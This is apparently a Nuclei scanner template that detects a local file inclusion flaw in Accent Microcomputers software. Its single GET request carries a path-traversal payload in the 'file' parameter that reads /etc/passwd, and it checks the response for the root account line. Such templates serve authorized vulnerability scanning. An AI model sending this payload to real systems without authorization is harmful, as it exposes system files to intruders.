id: accent-microcomputers-lfi
info:
  name: Accent Microcomputers LFI
  author: 0x_Akoko
  severity: high
  reference:
    - https://cxsecurity.com/issue/WLB-2018050036
    - http://www.accent.com.pl
  tags: microcomputers,accent,lfi
requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
